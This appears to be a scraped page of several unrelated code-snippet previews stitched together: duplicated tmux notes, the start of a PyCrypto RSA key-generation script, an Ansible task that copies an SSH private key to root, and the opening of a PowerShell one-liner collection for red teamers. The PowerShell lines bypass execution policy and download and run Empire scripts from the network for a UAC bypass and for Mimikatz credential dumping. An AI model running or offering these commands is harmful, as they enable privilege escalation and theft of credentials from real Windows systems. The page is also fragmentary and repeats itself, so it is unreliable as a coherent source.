As configured in my dotfiles.
start new:
tmux
start new with session name:
As configured in my dotfiles.
start new:
tmux
start new with session name:
| # Inspired from http://coding4streetcred.com/blog/post/Asymmetric-Encryption-Revisited-(in-PyCrypto) | |
| # PyCrypto docs available at https://www.dlitz.net/software/pycrypto/api/2.6/ | |
| from Crypto import Random | |
| from Crypto.PublicKey import RSA | |
| import base64 | |
| def generate_keys(): | |
| # RSA modulus length must be a multiple of 256 and >= 1024 | |
| modulus_length = 256*4 # use larger value in production |
| --- | |
| hosts: all | |
| tasks: | |
| - name: add github ssh key | |
| copy: > | |
| src=files/id_rsa.github | |
| dest=/root/.ssh/id_rsa.github | |
| owner=root | |
| group=root |
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
Please read official documentation from PfSense project here: